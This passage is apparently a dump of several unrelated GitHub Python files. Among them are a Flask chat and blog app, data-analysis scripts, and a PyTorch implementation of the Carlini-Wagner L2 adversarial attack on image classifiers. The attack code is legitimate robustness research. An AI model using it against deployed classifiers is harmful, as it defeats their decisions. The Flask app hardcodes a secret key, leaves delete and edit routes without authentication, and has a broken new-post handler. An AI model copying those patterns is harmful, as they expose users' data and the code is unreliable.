article['identifier'] = data['id']\n article['title'] = title(data)\n article['subtitle'] = data['deck']\n article['components'] = createComponents(data)\n return article\n except:\n print('error')\n\n\ndef title(data):\n if 'display_headline' in data and data['display_headline'] != \"\":\n return data['display_headline']\n elif 'headline' in data and data['headline'] != \"\":\n return data['headline']\n elif 'short_headline' in data and data['short_headline'] != \"\":\n return data['short_headline']\n\n\ndef createComponents(data):\n return [x for x in [\n titleComponent(data),\n introComponent(data),\n headerComponent(data),\n bodyComponent(data),\n authorComponent(data),\n ] if x];\n\n\n# COMPONENTS\n\ndef titleComponent(data):\n return {\n 'role': 'title',\n 'layout': 'titleLayout',\n 'text': title(data),\n 'textStyle': 'titleStyle',\n }\n\n\ndef introComponent(data):\n return {\n 'role': 'intro',\n 'layout': 'introLayout',\n 'text': data['deck'],\n 'textStyle': 'introStyle'\n }\n\n\ndef headerComponent(data):\n if 'image' in data:\n return {\n 'role': 'header',\n 'layout': 'headerImageLayout',\n 'style': {\n 'fill': {\n 'type': 'image',\n 'URL': data['image']['article_superhero_large'],\n 'fillMode': 'cover',\n 'verticalAlignment': 'center',\n }\n }\n }\n\n\ndef bodyComponent(data):\n content = ''.join([i for i in data['body'] if type(i) == str])\n return {\n 'role': 'body',\n 'text': content,\n 'format': 'html',\n 'layout': 'bodyLayout',\n 'textStyle': 'bodyStyle',\n }\n\n\ndef authorComponent(data):\n author = data['authors'][0];\n return {\n 'role': 'author',\n 'layout': 'authorLayout',\n 'text': '{}, {} | {}'.format(author['name'], author['role'], data['hero']['pubdate']),\n 'textStyle': 'authorStyle'\n }\n","repo_name":"danfujita/article-converter","sub_path":"converter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19806648936","text":"\n# function to return the count of passed series or list\n\n\ndef count(data):\n total_count = len(data)\n return total_count\n\n\n# function to return the required dataframe or series\n\ndef get_data(dataframe,required_column_list):\n dataframe = dataframe[required_column_list]\n return dataframe\n\n\n# function to plot bar chart\n\ndef plot_bar(plotly_obj, dataframe, x_axis, y_axis, plot_title):\n\n fig = plotly_obj.bar(dataframe, x=x_axis,\n y=y_axis,\n text=y_axis,\n )\n\n fig.update_traces(width=0.5,\n textposition='outside',\n marker_color='#F2BB05',\n hovertemplate = None,\n hoverinfo= 'skip',\n )\n\n fig.update_yaxes(visible=False)\n\n fig.update_xaxes({'type' : 'category'})\n\n fig.update_layout(title_text=''+ plot_title +'',\n title_x=0.5, title_y=0.95,\n uniformtext_minsize=8,\n uniformtext_mode='hide',\n xaxis_title=None,\n plot_bgcolor = '#0F0A0A')\n return fig\n\n\ndef get_grouped_data(dataframe,group_by_col, to_be_grouped):\n wc_matches_v1_grouped = dataframe.groupby(group_by_col)[to_be_grouped].sum().reset_index()\n return wc_matches_v1_grouped\n\n\ndef get_wc_matches_v1(dataframe, own_goal=False, filter_year=0, filter_country=''):\n req_cols = ['year', 'country', 'player_id', 'player_name', 'home_goals', 'away_goals', 'own_goal']\n dataframe = dataframe[req_cols]\n dataframe['goals'] = dataframe['home_goals'] + dataframe['away_goals']\n\n if filter_year != 0:\n filter_1 = dataframe['year'] == filter_year\n dataframe = dataframe[filter_1]\n\n if filter_country != '':\n filter_1 = dataframe['country'] == filter_country\n dataframe = dataframe[filter_1]\n\n if (own_goal):\n dataframe = dataframe[dataframe['own_goal'] == 0]\n\n return dataframe\n\n# function to get total world cups played\n\n\ndef get_total_wc_played(dataframe):\n req_col = ['edition']\n total_wc_played = get_data(dataframe,req_col).iloc[-1].values[0]\n return total_wc_played\n\n\n# total participating nations list\ndef get_total_participating_nations(dataframe,filter_year=0):\n req_col = 'country'\n if filter_year == 0:\n participating_nations = dataframe[req_col].unique()\n return participating_nations\n else:\n filter_1 = dataframe['year'] == filter_year\n participating_nations = dataframe[filter_1][req_col].unique()\n return participating_nations\n\n\n# Country and World Cup Win Freqency\n\ndef get_world_cup_win_frequency(dataframe):\n bar_data = dataframe['first'].value_counts().reset_index().rename(columns={'index': 'country', 'first': 'no_of_wins'})\n return bar_data\n\n# getting the list of year to add to the select box\n\n\ndef get_years_list(dataframe):\n year_list = dataframe['year'].tolist()\n return year_list;\n\n# using this function first,second, third, hosting_country and total_attendance\n# will be extracted for a given year\n\n\ndef get_yearly_overall_data(dataframe,selected_year,column_name):\n filter_year = dataframe['year'] == selected_year\n dataframe = dataframe[filter_year]\n data = dataframe[column_name].values[0]\n return data\n\n\n# getting the participation years of given country\n\ndef get_country_participation_years(dataframe,filter_country):\n req_col = 'year'\n filter_1 = dataframe['country'] == filter_country\n participating_years = dataframe[filter_1][req_col].unique()\n return participating_years\n\n\n# given a country how many times it won a world cup, first position, second position\n\ndef country_wc_win_position(dataframe,country_filter,pos):\n if pos == 1:\n filter_1 = dataframe['first'] == country_filter\n total_first = sum(filter_1)\n return total_first\n elif pos == 2:\n filter_1 = dataframe['second'] == country_filter\n total_second = sum(filter_1)\n return total_second\n elif pos == 3:\n filter_1 = dataframe['third'] == country_filter\n total_third = sum(filter_1)\n return total_third\n\n\n","repo_name":"sudarshanAw/fifa-wc-analysis-app","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5764058012","text":"import unittest\nfrom metro.station.station_class import *\nfrom metro.network.network_class import *\nfrom metro.helpers.file_helper import *\nfrom metro.const import *\nfrom metro.main import *\n\ninput = read_json_input('metro/inputs/input_1.json')\n\nclass TestNetwork(unittest.TestCase):\n \n stations = create_stations(input[\"stations\"])\n link_stations(stations, input[\"stations\"])\n network = create_network(stations, input[\"train color\"])\n start_station = stations[input[\"start\"]]\n train_colors = [None, GREEN, RED]\n \n def test_search_algorithm(self):\n '''\n testeamos que el algoritmo de búsqueda retorne diccionarios válidos,\n incluyendo las instancias de las estaciones con sus respectivas\n estaciones previas.\n '''\n previous_stations, shortest_path = search_algorithm(self.network, self.start_station) \n message_station_instace = \"given object is not instance of Station.\"\n message_cost = \"invalid path cost\"\n\n for key, value in previous_stations.items():\n self.assertIsInstance(key, Station, message_station_instace)\n self.assertIsInstance(value, Station, message_station_instace)\n for key, value in shortest_path.items():\n self.assertIsInstance(key, Station, message_station_instace)\n self.assertTrue(0 <= value <= MAX_VALUE, message_cost) # para comprobar que es int\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"snarriagada/Problema-metro","sub_path":"metro/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72733848802","text":"import os\nimport time\nfrom datetime import datetime\nfrom flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_login import LoginManager, login_user, current_user, logout_user\nfrom flask_socketio import SocketIO, join_room, leave_room, send\n\nfrom wtform_fields import *\nfrom models import *\n\n# Configure app\napp = Flask(__name__)\napp.secret_key=os.environ.get('SECRET')\napp.config['WTF_CSRF_SECRET_KEY'] = \"b'f\\xfa\\x8b{X\\x8b\\x9eM\\x83l\\x19\\xad\\x84\\x08\\xaa\"\napp.config['SQLALCHEMY_POOL_SIZE'] = 20\n\n# Configure database\napp.config['SQLALCHEMY_DATABASE_URI']=os.environ.get('DATABASE_URL')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n# Initialize login manager\nlogin = LoginManager(app)\nlogin.init_app(app)\n\n@login.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\nsocketio = SocketIO(app, manage_session=False)\n\n# Predefined rooms for chat\nROOMS = [\"lounge\", \"news\", \"games\", \"coding\"]\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n\n reg_form = RegistrationForm()\n\n # Update database if validation success\n if reg_form.validate_on_submit():\n username = reg_form.username.data\n password = reg_form.password.data\n\n # Hash password\n hashed_pswd = pbkdf2_sha256.hash(password)\n\n # Add username & hashed password to DB\n user = User(username=username, hashed_pswd=hashed_pswd)\n db.session.add(user)\n db.session.commit()\n\n flash('Registered successfully. Please login.', 'success')\n return redirect(url_for('login'))\n\n return render_template(\"index.html\", form=reg_form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n\n login_form = LoginForm()\n\n # Allow login if validation success\n if login_form.validate_on_submit():\n user_object = User.query.filter_by(username=login_form.username.data).first()\n login_user(user_object)\n return redirect(url_for('home'))\n\n return render_template(\"login.html\", form=login_form)\n\n\n@app.route(\"/logout\", methods=['GET'])\ndef logout():\n\n # Logout user\n logout_user()\n flash('You have logged out successfully', 'success')\n return redirect(url_for('login'))\n\n\n@app.route(\"/chat\", methods=['GET', 'POST'])\ndef chat():\n\n if not current_user.is_authenticated:\n flash('Please login', 'danger')\n return redirect(url_for('login'))\n\n return render_template(\"chat.html\", username=current_user.username, rooms=ROOMS)\n\n\n@app.route('/home')\ndef home():\n return render_template('home.html')\n\n@app.route('/lapa')\ndef lapa():\n return render_template('lapa.html')\n\n@app.route('/results')\ndef results():\n return render_template('results.html')\n\n\n@app.route('/about')\ndef contact():\n return render_template('contact.html')\n\n\nclass BlogPost(db.Model):\n __tablename__ = 'posts'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable=False)\n content = db.Column(db.Text, nullable=False)\n author = db.Column(db.String(20), nullable=False, default='N/A')\n date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __repr__(self):\n return 'Blog post ' + str(self.id)\n\n\n\n@app.route('/posts', methods=['GET', 'POST'])\ndef posts():\n\n if not current_user.is_authenticated:\n flash('Please login', 'danger')\n return redirect(url_for('login'))\n\n if request.method == 'POST':\n post_title = request.form['title']\n post_content = request.form['content']\n post_author = request.form['author']\n new_post = BlogPost(title=post_title, content=post_content, author=post_author)\n db.session.add(new_post)\n db.session.commit()\n return redirect('/posts')\n else:\n all_posts = BlogPost.query.order_by(BlogPost.date_posted).all()\n return render_template('posts.html', username=current_user.username, posts=all_posts)\n\n@app.route('/posts/delete/')\ndef delete(id):\n post = BlogPost.query.get_or_404(id)\n db.session.delete(post)\n db.session.commit()\n return redirect('/posts')\n\n@app.route('/posts/edit/', methods=['GET', 'POST'])\ndef edit(id):\n \n post = BlogPost.query.get_or_404(id)\n\n if request.method == 'POST':\n post.title = request.form['title']\n post.author = request.form['author']\n post.content = request.form['content']\n db.session.commit()\n return redirect('/posts')\n else:\n return render_template('edit.html', post=post)\n\n@app.route('/posts/new', methods=['GET', 'POST'])\ndef new_post():\n if request.method == 'POST':\n post.title = request.form['title']\n post.author = request.form['author']\n post.content = request.form['content']\n new_post = BlogPost(title=post_title, content=post_content, author=post_author)\n db.session.add(new_post)\n db.session.commit()\n return redirect('/posts')\n else:\n return render_template('new_post.html')\n\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n # note that we set the 404 status explicitly\n return render_template('404.html'), 404\n\n\n@socketio.on('incoming-msg')\ndef on_message(data):\n \"\"\"Broadcast messages\"\"\"\n\n msg = data[\"msg\"]\n username = data[\"username\"]\n room = data[\"room\"]\n # Set timestamp\n time_stamp = time.strftime('%b-%d %I:%M%p', time.localtime())\n send({\"username\": username, \"msg\": msg, \"time_stamp\": time_stamp}, room=room)\n\n\n@socketio.on('join')\ndef on_join(data):\n \"\"\"User joins a room\"\"\"\n\n username = data[\"username\"]\n room = data[\"room\"]\n join_room(room)\n\n # Broadcast that new user has joined\n send({\"msg\": username + \" has joined the \" + room + \" room.\"}, room=room)\n\n\n@socketio.on('leave')\ndef on_leave(data):\n \"\"\"User leaves a room\"\"\"\n\n username = data['username']\n room = data['room']\n leave_room(room)\n send({\"msg\": username + \" has left the room\"}, room=room)\n\n\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"ValtersHuns/aaaa","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14057064457","text":"from util import data_loader, label_generator\n\nimport datetime\nimport glob\nimport os\nimport time\n\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import accuracy_score\n\n\ndef sklearn_lr(shuffle=True):\n \"\"\"Function to perform linear regression using scikit-learn library.\n We want to perform a binary classification, so we classify from the output of the regression.\n Arg:\n shuffle := bool type flag to split train and valid data randomly(default=True)\n \"\"\"\n ##Get path delimiter (\"/\" or \"\\\") depending on OS\n SEP = os.sep\n ## Get the current time as a string (e.g.) July 28, 2021 18:40:39 => 20210728184039\n dt_now = datetime.datetime.now()\n dt_index = dt_now.strftime(\"%Y%m%d%H%M%S\")\n \n ##input the filename\n print(\"input dataset : \", end=(\"\"))\n data_name = input()\n if not os.path.isdir(\"datasets\" + SEP + data_name):\n print('ERROR: Cannnot find the dataset \"{}\"'.format(data_name))\n return -1\n ##make a directory path to save linear regression results\n ##(e.g. datasets/dataset1/LR/20210729123234/)\n dir_path = \"datasets\" + SEP + data_name + SEP + \"LR\" + SEP + dt_index + SEP\n ##Create a directory to store the results\n os.makedirs(dir_path)\n\n ##Read the dataset\n train_data, train_label, valid_data, valid_label, test_dataset, test_labelset \\\n = data_loader.load_data(\"LR\", data_name, dt_index)\n\n if shuffle:\n ##set the seed\n seed = np.random.randint(2**31)\n ##Combine training and validation data and divide randomly\n num_train_data = train_data.shape[0]\n temp_data = np.concatenate([train_data, valid_data], axis=0)\n temp_label = np.concatenate([train_label, valid_label], axis=0)\n from sklearn.model_selection import train_test_split\n train_data, valid_data, train_label, valid_label = train_test_split(temp_data, temp_label, train_size=num_train_data, random_state=seed)\n\n ## define a model set to do normalization\n lr = LinearRegression(normalize=True, n_jobs=-1)\n\n ##start training\n print(\"\\r\" + \"fitting...\", end=\"\")\n start = time.perf_counter()\n lr.fit(train_data, train_label)\n finish = time.perf_counter()\n\n ##Output time spent on training\n print(\"\\r\" + \"fit time : {}[s]\".format(finish-start))\n\n ##Make a directory to save the labels of the predictions output by the regression model.\n label_path = dir_path + \"predicted_labels\" + SEP \n os.makedirs(label_path)\n ##Prepare a text file to save the training results(discrimination accuracy) of linear regression.\n result_file = open(dir_path+\"result.txt\", mode=\"w\")\n\n ##Get predictive labels for training data\n predicted_train = label_generator.scaler_to_label(lr.predict(train_data))\n ##Calculate identification accuracy(TP/(TP+FP)) and output\n train_acc = accuracy_score(train_label, predicted_train)\n print(\"\\ntrain :\", train_acc)\n ##Save identification accuracy and identification results\n result_file.write(\"train : {}\\n\".format(train_acc))\n np.save(label_path+\"train_predicted_label\", predicted_train)\n\n ##Get predictive labels for validation data\n predicted_valid = label_generator.scaler_to_label(lr.predict(valid_data))\n ##Calculate identification accuracy(TP/(TP+FP)) and output\n valid_acc = accuracy_score(valid_label, predicted_valid)\n print(\"valid :\", valid_acc)\n ##Save identification accuracy and identification results\n result_file.write(\"valid : {}\\n\".format(valid_acc))\n np.save(label_path+\"valid_predicted_label\", predicted_valid)\n\n ##result of test data\n for i in range(len(test_dataset)):\n ##Get predictive labels for test data\n predicted_test = label_generator.scaler_to_label(lr.predict(test_dataset[i]))\n ##Calculate identification accuracy(TP/(TP+FP)) and output\n test_acc = accuracy_score(test_labelset[i], predicted_test)\n print(\"test{} : {}\".format(i+1, test_acc))\n ##Save identification accuracy and identification results\n result_file.write(\"test{} : {}\\n\".format(i+1, test_acc))\n np.save(label_path+\"test{}_predicted_label\".format(i+1), predicted_test)\n \n ##Close text file to save linearSVM results\n result_file.close()\n\n ##Save parameters, etc.\n with open(dir_path+\"paras.txt\", mode=\"w\") as f:\n f.write(\"fit time : {}\\n\".format(finish-start))\n f.write(\"shuffle : {}\\n\".format(shuffle))\n if shuffle:\n f.write(\"seed : {}\\n\".format(seed))\n\nif __name__ == \"__main__\":\n sklearn_lr(shuffle=True)","repo_name":"mf-22/t-design_MPbased_cpp","sub_path":"ml/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72802939043","text":"import pandas as pd\nimport numpy as np\nfrom common.sheetOperations import SheetOps\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nobj = SheetOps()\n\nno_of_past_candles = 20 #configurable\ndf = pd.read_csv('Investing/d_csv/TATASTEEL_5.csv')\n\n\nslice = df.iloc[:no_of_past_candles]\nprint(len(slice.index))\n\n\n\ndef get_outliers(df, column_name):\n try:\n mn = df[column_name].mean()\n sd = df[column_name].std()\n final_list = [x for x in df[column_name] if (x > mn - 2 * sd)]\n final_list = [x for x in final_list if (x < mn + 2 * sd)]\n list_of_outliers = list(set(df[column_name].values.tolist()) - set(final_list))\n return list_of_outliers\n #return sorted(list_of_outliers, reverse=True)\n except Exception as e:\n print('Exception in getting list of outliers', e)\n return []\n\ncolumns_to_write = ['datetime', 'symbol', 'pid', 'resolution', 'close',\n 'volume', 'per_change', 'volume_high_count', 'close_count', 'per_change_count']\nslice = slice[columns_to_write]\noutliers_close_rows = slice[slice.close_count.isin(get_outliers(slice, 'close_count'))]\noutliers_volume_rows = slice[slice.volume_high_count.isin(get_outliers(slice, 'volume_high_count'))]\noutliers_per_rows = slice[slice.per_change_count.isin(get_outliers(slice, 'per_change_count'))]\n\nprint(outliers_close_rows)\ndef write_sheet(write_list, l, position=-1):\n for wl in write_list:\n if position != -1 and len(l) == 0:\n wl[position] = ' '\n if position == -1 and len(l) != 0:\n for i in l:\n wl[i] = ' '\n obj.writeSheet('CIEnotifications', wl, 'InvestingNotify')\n\n#all three\ntemp = pd.merge(outliers_close_rows, outliers_volume_rows, how='inner', on=columns_to_write)\nocr_ovr_opr = pd.merge(temp, outliers_per_rows, how='inner', on=columns_to_write)\n#ocr_ovr_opr = pd.concat([outliers_close_rows, outliers_volume_rows, outliers_per_rows], axis=1, join='inner')\nif len(ocr_ovr_opr) !=0:\n # write sheet\n write_list = ocr_ovr_opr.values.tolist()\n write_sheet(write_list, [], -2)\n for dt in ocr_ovr_opr['datetime']:\n outliers_close_rows.drop(outliers_close_rows[outliers_close_rows['datetime'] == dt].index, inplace=True)\n outliers_volume_rows.drop(outliers_volume_rows[outliers_volume_rows['datetime'] == dt].index, inplace=True)\n outliers_close_rows.drop(outliers_per_rows[outliers_per_rows['datetime'] == dt].index, inplace=True)\n\n#any two\nocr_ovr = pd.merge(outliers_close_rows, outliers_volume_rows, how='inner', on=columns_to_write)\n# ocr_ovr = pd.concat([outliers_close_rows, outliers_volume_rows], axis=1, join='inner')\n\nif len(ocr_ovr) != 0:\n # write sheet\n write_list = ocr_ovr.values.tolist()\n write_sheet(write_list, [columns_to_write.index('per_change_count'),columns_to_write.index('per_change')], position=-1)\n for dt in ocr_ovr['datetime']:\n outliers_close_rows.drop(outliers_close_rows[outliers_close_rows['datetime'] == dt].index, inplace=True)\n outliers_volume_rows.drop(outliers_volume_rows[outliers_volume_rows['datetime'] == dt].index, inplace=True)\n\n\nocr_opr = pd.merge(outliers_close_rows, outliers_per_rows, how='inner', on=columns_to_write)\nif len(ocr_opr) != 0:\n # write sheet\n write_list = ocr_opr.values.tolist()\n write_sheet(write_list, [columns_to_write.index('volume'),columns_to_write.index('volume_high_count')], position=-1)\n for dt in ocr_opr['datetime']:\n outliers_close_rows.drop(outliers_close_rows[outliers_close_rows['datetime'] == dt].index, inplace=True)\n outliers_per_rows.drop(outliers_per_rows[outliers_per_rows['datetime'] == dt].index, inplace=True)\n#\novr_opr = pd.merge(outliers_volume_rows, outliers_per_rows, how='inner', on=columns_to_write)\nif len(ovr_opr) != 0:\n # write sheet\n write_list = ovr_opr.values.tolist()\n write_sheet(write_list, [columns_to_write.index('close'),columns_to_write.index('close_count')], position=-1)\n for dt in ovr_opr['datetime']:\n outliers_volume_rows.drop(outliers_volume_rows[outliers_volume_rows['datetime'] == dt].index, inplace=True)\n outliers_per_rows.drop(outliers_per_rows[outliers_per_rows['datetime'] == dt].index, inplace=True)\n\n\n# write remaining sheets\nif len(outliers_close_rows) != 0:\n #write sheet\n write_list = outliers_close_rows.values.tolist()\n write_sheet(write_list, [columns_to_write.index('volume'),columns_to_write.index('per_change'),\n columns_to_write.index('volume_high_count'), columns_to_write.index('per_change_count')], -1)\n\nif len(outliers_volume_rows) != 0:\n # write sheet\n write_list = outliers_volume_rows.values.tolist()\n write_sheet(write_list, [columns_to_write.index('close'),columns_to_write.index('per_change'),\n columns_to_write.index('close_count'), columns_to_write.index('per_change_count')], -1)\n\nif len(outliers_per_rows) !=0:\n # write sheet\n write_list = outliers_per_rows.values.tolist()\n write_sheet(write_list, [columns_to_write.index('close'),columns_to_write.index('volume'),\n columns_to_write.index('volume_high_count'), columns_to_write.index('close_count')], -1)\n\n#\n\n\n\n\n\n\n","repo_name":"akewarmayur/StocksAnalysis","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3243334334","text":"entrada = str(input(\"digite algo:\"))\r\nletra = 0 \r\nnum = 0\r\nfor x in entrada:\r\n\tif x.isdigit():\r\n\t\tnum += 1\r\n\telif x.isalpha():\r\n\t\tletra+= 1 \r\n\telif x.isspace():\r\n\t\t letra+= 1\r\n\r\nprint(f\"Letra:{letra}\\nDigitos{num}\")\r\n\r\n\r\n","repo_name":"bbrecht02/aprendendo.py","sub_path":"listafinal/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27680297698","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# References: N. Carlini and D. Wagner, \"Towards evaluating the robustness of neural networks,\" in S&P, 2017.\n# Reference Implementation from Authors (TensorFlow): https://github.com/carlini/nn_robust_attacks\n# **************************************\n# @Time : 2018/10/17 23:03\n# @Author : Saizuo Wang & Xiang Ling & Jiannan Wang\n# @Lab : nesa.zju.edu.cn\n# @File : CW2.py\n# **************************************\n\n\nimport math\n\nimport numpy as np\nimport torch\n\nfrom Attacks.AttackMethods.AttackUtils import tensor2variable\nfrom Attacks.AttackMethods.attacks import Attack\n\n\nclass CW2Attack(Attack):\n\n def __init__(self, model=None, kappa=0, init_const=0.001, lr=0.02, binary_search_steps=5, max_iters=10000, lower_bound=0.0, upper_bound=1.0):\n \"\"\"\n\n :param model:\n :param kappa:\n :param init_const:\n :param lr:\n :param binary_search_steps:\n :param max_iters:\n :param lower_bound:\n :param upper_bound:\n \"\"\"\n super(CW2Attack, self).__init__(model=model)\n self.model = model\n\n self.kappa = kappa * 1.0\n self.learning_rate = lr\n self.init_const = init_const\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n self.max_iterations = max_iters\n self.binary_search_steps = binary_search_steps\n\n def perturbation(self, samples, ys_targets, batch_size, device):\n \"\"\"\n\n :param samples:\n :param ys_targets:\n :param batch_size:\n :param device:\n :return:\n \"\"\"\n assert len(samples) == batch_size, \"the length of sample is not equal to the batch_size\"\n\n # transform the samples [lower, upper] to [-1, 1] and then to the arctanh space\n mid_point = (self.upper_bound + self.lower_bound) * 0.5\n half_range = (self.upper_bound - self.lower_bound) * 0.5\n arctanh_samples = np.arctanh((samples - mid_point) / half_range * 0.9999)\n var_samples = tensor2variable(torch.from_numpy(arctanh_samples), device=device, requires_grad=True)\n\n # set the lower and upper bound for searching 'c' const in the CW2 attack\n const_origin = np.ones(shape=batch_size, dtype=float) * self.init_const\n c_upper_bound = [1e10] * batch_size\n c_lower_bound = np.zeros(batch_size)\n\n # convert targets to one hot encoder\n temp_one_hot_matrix = np.eye(10)\n targets_in_one_hot = []\n for i in range(batch_size):\n current_target = temp_one_hot_matrix[ys_targets[i]]\n targets_in_one_hot.append(current_target)\n targets_in_one_hot = tensor2variable(torch.FloatTensor(np.array(targets_in_one_hot)), device=device)\n\n best_l2 = [1e10] * batch_size\n best_perturbation = np.zeros(var_samples.size())\n current_prediction_class = [-1] * batch_size\n\n def attack_achieved(pre_softmax, target_class):\n pre_softmax[target_class] -= self.kappa\n return np.argmax(pre_softmax) == target_class\n\n self.model.eval()\n # Outer loop for linearly searching for c\n for search_for_c in range(self.binary_search_steps):\n\n modifier = torch.zeros(var_samples.size()).float()\n modifier = tensor2variable(modifier, device=device, requires_grad=True)\n optimizer = torch.optim.Adam([modifier], lr=self.learning_rate)\n var_const = tensor2variable(torch.FloatTensor(const_origin), device=device)\n print(\"\\tbinary search step {}:\".format(search_for_c))\n\n for iteration_times in range(self.max_iterations):\n # inverse the transform tanh -> [0, 1]\n perturbed_images = torch.tanh(var_samples + modifier) * half_range + mid_point\n prediction = self.model(perturbed_images)\n\n l2dist = torch.sum((perturbed_images - (torch.tanh(var_samples) * half_range + mid_point)) ** 2, [1, 2, 3])\n\n constraint_loss = torch.max((prediction - 1e10 * targets_in_one_hot).max(1)[0] - (prediction * targets_in_one_hot).sum(1),\n torch.ones(batch_size, device=device) * self.kappa * -1)\n\n loss_f = var_const * constraint_loss\n loss = l2dist.sum() + loss_f.sum() # minimize |r| + c * loss_f(x+r,l)\n optimizer.zero_grad()\n loss.backward(retain_graph=True)\n optimizer.step()\n\n # update the best l2 distance, current predication class as well as the corresponding adversarial example\n for i, (dist, score, img) in enumerate(\n zip(l2dist.data.cpu().numpy(), prediction.data.cpu().numpy(), perturbed_images.data.cpu().numpy())):\n if dist < best_l2[i] and attack_achieved(score, ys_targets[i]):\n best_l2[i] = dist\n current_prediction_class[i] = np.argmax(score)\n best_perturbation[i] = img\n\n # update the best constant c for each sample in the batch\n for i in range(batch_size):\n if current_prediction_class[i] == ys_targets[i] and current_prediction_class[i] != -1:\n c_upper_bound[i] = min(c_upper_bound[i], const_origin[i])\n if c_upper_bound[i] < 1e10:\n const_origin[i] = (c_lower_bound[i] + c_upper_bound[i]) / 2.0\n else:\n c_lower_bound[i] = max(c_lower_bound[i], const_origin[i])\n if c_upper_bound[i] < 1e10:\n const_origin = (c_lower_bound[i] + c_upper_bound[i]) / 2.0\n else:\n const_origin[i] *= 10\n\n return np.array(best_perturbation)\n\n def batch_perturbation(self, xs, ys_target, batch_size, device):\n \"\"\"\n\n :param xs:\n :param ys_target:\n :param batch_size:\n :param device:\n :return:\n \"\"\"\n assert len(xs) == len(ys_target), \"The lengths of samples and its ys should be equal\"\n\n adv_sample = []\n number_batch = int(math.ceil(len(xs) / batch_size))\n for index in range(number_batch):\n start = index * batch_size\n end = min((index + 1) * batch_size, len(xs))\n print('\\r===> in batch {:>2}, {:>4} ({:>4} in total) nature examples are perturbed ... '.format(index, end - start, end), end=' ')\n\n batch_adv_images = self.perturbation(xs[start:end], ys_target[start:end], batch_size, device)\n adv_sample.extend(batch_adv_images)\n return np.array(adv_sample)\n","repo_name":"ryderling/DEEPSEC","sub_path":"Attacks/AttackMethods/CW2.py","file_name":"CW2.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"54"} +{"seq_id":"73902533601","text":"import bentoml\nimport numpy as np\nfrom bentoml.io import NumpyNdarray \n\nmodel_ref = bentoml.sklearn.get(\"mlzoomcamp_homework:jsi67fslz6txydu5\")\n\nmodel_runner = model_ref.to_runner()\nsvc = bentoml.Service(\"homework_1\", runners=[model_runner])\n\n@svc.api(input=NumpyNdarray(), output=NumpyNdarray())\ndef predict(input_series: np.ndarray) -> np.ndarray:\n result = model_runner.predict.run(input_series)\n return result\n","repo_name":"Emekadavid/zoomcode","sub_path":"zoom7/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21971380640","text":"## Opening election_results.csv\n\n# import modules (add our dependencies)\nimport csv\nimport os\n\n# assign a variable for the csv file to load and the path.\nfile_to_load = os.path.join(\"Resources\", \"election_results.csv\")\n# Assign a variable to save the file to a path\nfile_to_save = os.path.join(\"analysis\", \"election_analysis.txt\")\n\n\n# Initialize a total vote counter.\ntotal_votes = 0\n\n# Declare list and print candidate name from each row\ncandidate_options = []\n\n# Declare candidate votes dictionary for candidate name and votes per candidate\ncandidate_votes = {}\n\n# Declare a variable that holds empty string for winning candidate\nwinning_candidate = \"\"\n# Declare a variable for \"winning_count\" equal to 0\nwinning_count = 0\n# Delcare a variable for \"winning_percentage\" equal to 0\nwinning_percentage = 0\n\n \n# Use with statement to open the csv election results and read the file\nwith open(file_to_load) as election_data:\n #Read the file object with the reader function\n file_reader = csv.reader(election_data)\n\n #Read the header row\n headers = next(file_reader)\n\n\n # Create a for loop to loop through all rows for candidate and vote information\n #Print each row in the CSV file\n for row in file_reader:\n\n # add to the total vote count\n total_votes += 1\n\n # get candidates names from the row \n candidate_name = row[2]\n\n # if candidate does not match any existing candidate, create if statement. Within for loop.\n if candidate_name not in candidate_options:\n # add the candidate name to the candidate_options list using append\n candidate_options.append(candidate_name)\n\n # create each candidate as a key for the dictionary above. Begin tracking candidates vote count.\n candidate_votes[candidate_name] = 0\n\n # add a vote to each candidates count to find total votes per candidate (inside the for loop)\n candidate_votes[candidate_name] += 1\n\n#Save the results to our text file\nwith open(file_to_save, \"w\") as txt_file:\n #Print the final count to the terminal\n election_results = (\n f\"\\nElection Results\\n\"\n f\"----------------------\\n\"\n f\"Total Votes: {total_votes:,}\\n\"\n f\"----------------------\\n\"\n )\n print(election_results, end=\"\")\n #Save the final vote count to the text file\n txt_file.write(election_results)\n\n #Create for loop to determine percentage of votes for each candidate by looping through vote counts\n # Iterate through the candidate list\n for candidate_name in 